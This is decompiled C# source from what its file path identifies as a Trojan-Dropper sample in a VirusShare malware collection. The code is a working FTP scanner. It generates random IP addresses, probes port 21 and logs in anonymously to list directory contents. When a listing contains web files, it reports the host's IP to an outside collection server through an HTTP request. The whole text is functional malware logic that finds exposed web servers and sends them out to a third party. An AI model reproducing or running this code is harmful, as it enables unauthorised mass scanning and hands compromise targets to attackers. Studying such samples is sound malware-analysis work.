// Decompiled with JetBrains decompiler // Type: FTPscanner.Ftp // Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe using System.IO; using System.Net; using System.Net.Sockets; using System.Text; using System.Threading; namespace FTPscanner { internal class Ftp { public static void GrabBanner() { while (true) { try { string ipadress = Rng.GenerateIp(); IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(ipadress), 21); Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { socket.Connect((EndPoint) remoteEP); } catch { } NetworkStream networkStream = new NetworkStream(socket); if (networkStream.CanRead) { new Thread((ThreadStart) (() => Ftp.CheckHost(ipadress))).Start(); } else { networkStream.Close(); socket.Close(); } } catch { } } } public static void CheckHost(string ipadress) { try { if (!(WebRequest.Create("ftp://" + ipadress) is FtpWebRequest ftpWebRequest)) return; ftpWebRequest.Method = "LIST"; ftpWebRequest.Proxy = (IWebProxy) null; ftpWebRequest.Credentials = (ICredentials) new NetworkCredential("anonymous", "britney@spears.com"); ftpWebRequest.Timeout = 10000; if (ftpWebRequest.GetResponse() is FtpWebResponse response) { string end = new StreamReader(response.GetResponseStream(), Encoding.ASCII).ReadToEnd(); if (end.Contains("www") || end.Contains(".php") || end.Contains(".asp")) { try { WebRequest.Create("http://sdollars.comxa.com/l.php?w=ftp://" + ipadress + " - ").GetResponse(); } catch { } response.Close(); } response.Close(); } } catch { } } } }